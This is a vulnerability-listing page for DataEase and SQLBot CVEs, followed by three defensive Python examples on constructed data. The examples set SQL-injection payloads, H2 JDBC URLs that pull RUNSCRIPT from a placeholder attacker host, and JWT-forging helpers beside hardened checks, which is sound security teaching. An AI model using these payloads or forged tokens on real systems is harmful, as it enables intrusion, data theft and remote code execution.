VYPR

Vendor: Dataease
Products: 2
CVEs: 80 (80 across products)
Status: Private

Recent CVEs (20 of 80 listed below)
  • CVE-2026-33324 (High), May 5, 2026
    risk 0.57, CVSS 8.8, EPSS 0.01

    SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering…

  • CVE-2026-33122 (Critical), Apr 16, 2026
    risk 0.57, CVSS 9.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource update process. When a new table definition is added during a datasource update via /de2api/datasource/update, the…

  • CVE-2026-33082 (Critical), Apr 16, 2026
    risk 0.57, CVSS 9.8, EPSS 0.00

    DataEase is an open source data visualization analysis tool. Versions 2.10.20 and below contain a SQL injection vulnerability in the dataset export functionality. The expressionTree parameter in POST /de2api/datasetTree/exportDataset is deserialized into a filtering object and…

  • CVE-2026-40901 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.01

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below ship the legacy velocity-1.7.jar, which pulls in commons-collections-3.2.1.jar containing the InvokerTransformer deserialization gadget chain. Quartz 2.3.2, also bundled in the…

  • CVE-2026-40900 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /de2api/datasetData/previewSql endpoint. The user-supplied SQL is wrapped in a subquery without validation that the input is a single…

  • CVE-2026-33207 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the /datasource/getTableField endpoint. The getTableFiledSql method in CalciteProvider.java incorporates the tableName parameter directly…

  • CVE-2026-33121 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the API datasource saving process. The deTableName field from the Base64-encoded datasource configuration is used to construct a DDL…

  • CVE-2026-33084 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the sort parameter of the /de2api/datasetData/enumValueObj endpoint. The DatasetDataManage service layer directly transfers the user-supplied…

  • CVE-2026-33083 (High), Apr 16, 2026
    risk 0.50, CVSS 8.8, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a SQL injection vulnerability in the orderDirection parameter used in dataset-related endpoints including /de2api/datasetData/enumValueDs and…

  • CVE-2026-40899 (Medium), Apr 16, 2026
    risk 0.35, CVSS 6.5, EPSS 0.00

    DataEase is an open-source data visualization and analytics platform. Versions 2.10.20 and below contain a JDBC parameter blocklist bypass vulnerability in the MySQL datasource configuration. The Mysql class uses Lombok's @Data annotation, which auto-generates a public setter…

  • CVE-2025-15597 (Medium), Mar 2, 2026
    risk 0.34, CVSS 6.3, EPSS 0.01

    A vulnerability has been found in Dataease SQLBot up to 1.4.0. This affects an unknown function of the file backend/apps/system/api/assistant.py of the component API Endpoint. Such manipulation leads to improper access controls. It is possible to launch the attack remotely. The…

  • CVE-2026-8724 (Medium), May 17, 2026
    risk 0.31, CVSS 4.7, EPSS 0.00

    A security flaw has been discovered in Dataease 2.10.20. Impacted is the function SqlparserUtils.transFilter of the file SqlparserUtils.java of the component Data Dashboard. The manipulation results in sql injection. The attack may be launched remotely. The exploit has been…

  • CVE-2026-5417 (Medium), Apr 2, 2026
    risk 0.31, CVSS 4.7, EPSS 0.00

    A vulnerability was determined in Dataease SQLbot up to 1.6.0. This issue affects the function get_es_data_by_http of the file backend/apps/db/es_engine.py of the component Elasticsearch Handler. Manipulation of the argument address causes server-side request forgery. The…

  • CVE-2025-15598 (Low), Mar 3, 2026
    risk 0.24, CVSS 3.7, EPSS 0.00

    A vulnerability was found in Dataease SQLBot up to 1.5.1. This impacts the function validateEmbedded of the file backend/apps/system/middleware/auth.py of the component JWT Token Handler. Performing a manipulation results in improper verification of cryptographic signature. The…

  • CVE-2024-30269, Apr 8, 2024
    risk 0.10, CVSS n/a, EPSS 0.16

    DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.…

  • CVE-2024-47073, Nov 7, 2024
    risk 0.04, CVSS n/a, EPSS 0.01

    DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any…

  • CVE-2025-49002, Jun 3, 2025
    risk 0.02, CVSS n/a, EPSS 0.42

    DataEase is an open source business intelligence and data visualization tool. Versions prior to 2.10.10 have a flaw in the patch for CVE-2025-32966 that allows the patch to be bypassed through case insensitivity, because only the uppercase INIT and RUNSCRIPT keywords are prohibited. The vulnerability…

  • CVE-2024-46997, Sep 23, 2024
    risk 0.02, CVSS n/a, EPSS 0.01

    DataEase is an open source data visualization analysis tool. Prior to version 2.10.1, an attacker can achieve remote command execution by adding a carefully constructed H2 data source connection string. The vulnerability has been fixed in v2.10.1.

  • CVE-2025-57772, Aug 25, 2025
    risk 0.01, CVSS n/a, EPSS 0.08

    DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, there is a H2 JDBC RCE bypass in DataEase. If the JDBC URL meets criteria, the getJdbcUrl method is returned, which acts as the getter for the JdbcUrl parameter provided. This…

  • CVE-2025-57773, Aug 25, 2025
    risk 0.01, CVSS n/a, EPSS 0.07

    DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.12, because DB2 parameters are not filtered, a JNDI injection attack can be directly launched. JNDI triggers an AspectJWeaver deserialization attack, writing to various files.…
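Several entries above (CVE-2026-33207, CVE-2026-33083, CVE-2026-33084, CVE-2026-40900) describe the same defect class: a table name, sort column or ORDER BY direction taken from the request and concatenated into SQL text. The following is an added example written for this page, not DataEase code; it uses an in-memory SQLite database with a constructed schema (the `sales` and `users` tables, the `permitted_tables` parameter and the payload strings are all assumptions for the demo), and shows the concatenating version beside one that resolves identifiers against an allowlist, quotes them, and restricts the direction keyword to its two legal values.

```python
"""Identifier injection in a dataset preview: concatenation versus allowlist.

Added example, not DataEase project code. Models the defect class of
CVE-2026-33207 (table name concatenated into SQL) and CVE-2026-33083 /
CVE-2026-33084 (sort and orderDirection passed through to ORDER BY) on a
constructed SQLite schema. DataEase targets many JDBC backends; the quoting
rules used here are SQLite's (double-quoted identifiers).
"""
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample: a dataset table and a table the dataset must not reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE sales(id INTEGER, region TEXT, amount INTEGER);
        INSERT INTO sales VALUES (1, 'east', 10), (2, 'west', 20);
        CREATE TABLE users(id INTEGER, name TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'pbkdf2$example$hash');
        """
    )
    return conn


def preview_unsafe(conn, table_name, sort, direction):
    """Vulnerable pattern: every caller-controlled identifier lands in the SQL text."""
    sql = f"SELECT * FROM {table_name} ORDER BY {sort} {direction} LIMIT 100"
    return conn.execute(sql).fetchall()


ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def quote_ident(name: str) -> str:
    """SQL-standard identifier quoting: double quotes, embedded quotes doubled."""
    return '"' + name.replace('"', '""') + '"'


def preview_safe(conn, permitted_tables, table_name, sort, direction):
    """Hardened: the table must be one the dataset is configured for, the sort
    column must exist on that table, and the direction is a fixed keyword.
    Only then are the identifiers quoted into the statement."""
    if table_name not in permitted_tables:
        raise ValueError(f"table not permitted: {table_name!r}")
    columns = {row[1] for row in conn.execute(f"PRAGMA table_info({quote_ident(table_name)})")}
    if sort not in columns:
        raise ValueError(f"unknown sort column: {sort!r}")
    direction = direction.strip().upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"bad direction: {direction!r}")
    sql = (
        f"SELECT * FROM {quote_ident(table_name)} "
        f"ORDER BY {quote_ident(sort)} {direction} LIMIT 100"
    )
    return conn.execute(sql).fetchall()


def rejects(fn, *args) -> bool:
    """True if fn raises ValueError for these arguments (used to exercise the checks)."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


# Constructed payloads. The first rides the table name and appends a UNION;
# the second rides the direction keyword and rewrites the tail of the query.
TABLE_PAYLOAD = "sales UNION SELECT id, name, password_hash FROM users --"
DIRECTION_PAYLOAD = "ASC LIMIT 1 --"


if __name__ == "__main__":
    db = build_sample_db()
    print(preview_unsafe(db, TABLE_PAYLOAD, "id", "ASC"))       # leaks the users row
    print(preview_unsafe(db, "sales", "id", DIRECTION_PAYLOAD))  # attacker-shaped query
    print(preview_safe(db, {"sales"}, "sales", "amount", "desc"))
    print(rejects(preview_safe, db, {"sales"}, TABLE_PAYLOAD, "id", "ASC"))
```

Note that quoting alone does not fix the direction parameter: `"ASC LIMIT 1 --"` is not an identifier, so the only defence is to compare it against the two keywords the grammar allows. The same holds for any other keyword-position parameter.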
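CVE-2025-49002 above is the textbook failure of a keyword blocklist on a connection string: the fix for CVE-2025-32966 rejected the tokens INIT and RUNSCRIPT, and the lowercase spellings went straight through because H2 does not care about case. CVE-2026-40899 makes the related point that a blocklist of parameter names can be sidestepped by a path the list never considered. The example below is added for this page and is not DataEase project code; it puts the naive substring check beside a parse-then-allowlist check. The allowed settings, the path policy and the sample URLs (including the placeholder host `attacker.example`) are constructed for the demo.

```python
"""H2 JDBC URL settings: substring blocklist versus parsed allowlist.

Added example for this listing, not DataEase or SQLBot project code.
Models the bypass class of CVE-2025-49002 (a case-sensitive check on the
literal tokens INIT and RUNSCRIPT) and the general fragility of parameter
blocklists noted under CVE-2026-40899. Allowlist, path policy and sample
URLs are constructed for the demo.
"""
from __future__ import annotations

BLOCKED_TOKENS = ("INIT", "RUNSCRIPT")


def naive_is_safe(jdbc_url: str) -> bool:
    """Weak check: case-sensitive substring match on the raw URL."""
    return not any(token in jdbc_url for token in BLOCKED_TOKENS)


# Hypothetical policy: the settings a BI connector legitimately needs and the
# database locations it may open. Anything else fails closed, however it is
# spelled, because H2 matches setting names case-insensitively.
ALLOWED_SETTINGS = {"mode", "db_close_delay", "schema", "user", "password"}
ALLOWED_PATH_PREFIXES = ("mem:", "file:", "./")


def parse_h2_url(jdbc_url: str) -> tuple[str, dict[str, str]]:
    """Split 'jdbc:h2:<path>;NAME=VALUE;...' into (path, {name.lower(): value})."""
    scheme = "jdbc:h2:"
    if not jdbc_url.lower().startswith(scheme):
        raise ValueError("not an H2 JDBC URL")
    path, *raw_settings = jdbc_url[len(scheme):].split(";")
    settings: dict[str, str] = {}
    for item in raw_settings:
        if not item.strip():
            continue
        name, sep, value = item.partition("=")
        if not sep:
            raise ValueError(f"malformed setting: {item!r}")
        settings[name.strip().lower()] = value.strip()
    return path, settings


def hardened_is_safe(jdbc_url: str) -> bool:
    """Allowlist check: parse first, then accept only known settings and paths."""
    try:
        path, settings = parse_h2_url(jdbc_url)
    except ValueError:
        return False
    if not path.startswith(ALLOWED_PATH_PREFIXES):
        return False
    return all(name in ALLOWED_SETTINGS for name in settings)


# Constructed sample URLs; attacker.example is a placeholder host.
LEGIT = "jdbc:h2:./data/de;MODE=MySQL;DB_CLOSE_DELAY=-1"
UPPERCASE_ATTACK = "jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://attacker.example/x.sql'"
LOWERCASE_BYPASS = "jdbc:h2:mem:x;init=runscript from 'http://attacker.example/x.sql'"
REMOTE_SERVER = "jdbc:h2:tcp://attacker.example/db;MODE=MySQL"


if __name__ == "__main__":
    for url in (LEGIT, UPPERCASE_ATTACK, LOWERCASE_BYPASS, REMOTE_SERVER):
        print(f"naive={naive_is_safe(url)!s:5} hardened={hardened_is_safe(url)!s:5} {url}")
```

The hardened check never looks for dangerous words at all: it parses the URL into the structure the driver will see, normalises the setting names, and refuses anything outside the short list the product actually uses. A new dangerous setting, an alternative spelling, or a remote `tcp://` location all fail by default instead of needing a new blocklist entry.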
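CVE-2024-47073 and CVE-2025-15598 both come down to a token being decoded without its signature being checked, which lets anyone mint a token with whatever claims they like. The example below is added for this page and is not DataEase or SQLBot code; it uses only the Python standard library to build a minimal HS256 issuer, show the two attacker moves against an unverifying decoder (an `alg: none` token and a genuine token with its payload swapped), and put a verifier beside it that pins the algorithm, compares the MAC in constant time and requires an expiry. The key, claims and timestamps are constructed sample values.

```python
"""JWT handling: decoding without a signature check versus full verification.

Added example, not DataEase or SQLBot project code. Models the defect class
of CVE-2024-47073 and CVE-2025-15598 (tokens accepted without signature
verification). Standard library only; key and claims are sample values.
"""
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a genuine HS256 token."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(mac)}"


def forge_unsigned(claims: dict) -> str:
    """Attacker move 1: an 'alg: none' token with an empty signature."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def retarget_payload(token: str, claims: dict) -> str:
    """Attacker move 2: keep a genuine header and signature, swap the claims."""
    header, _payload, sig = token.split(".")
    return ".".join((header, _segment(claims), sig))


def decode_unverified(token: str) -> dict:
    """Vulnerable pattern: trusts the payload, ignores header and signature."""
    _header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(payload))


def decode_verified(token: str, key: bytes, now: float | None = None) -> dict:
    """Hardened: fixed algorithm, constant-time MAC comparison, mandatory expiry."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # refuses 'none' and algorithm confusion
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    now = time.time() if now is None else now
    if "exp" not in claims or claims["exp"] <= now:
        raise ValueError("missing or expired exp")
    return claims


def accepts(fn, *args) -> bool:
    """True if the decoder returns claims instead of raising ValueError."""
    try:
        fn(*args)
    except ValueError:
        return False
    return True


KEY = b"constructed-demo-key-not-for-production"  # sample value
VIEWER = {"sub": "alice", "role": "viewer", "exp": 2_000_000_000}
ADMIN = {"sub": "admin", "role": "admin", "exp": 2_000_000_000}


if __name__ == "__main__":
    genuine = sign_hs256(VIEWER, KEY)
    for name, tok in (("forged", forge_unsigned(ADMIN)), ("retargeted", retarget_payload(genuine, ADMIN))):
        print(name, "unverified ->", decode_unverified(tok)["role"],
              "| verified ->", accepts(decode_verified, tok, KEY))
```

The decoder must be told which algorithm to expect; reading it from the header hands the choice to the attacker. Note also that `token.split(".")` raising on a malformed token is caught by the same `ValueError` path, so a garbage token is refused rather than crashing the handler.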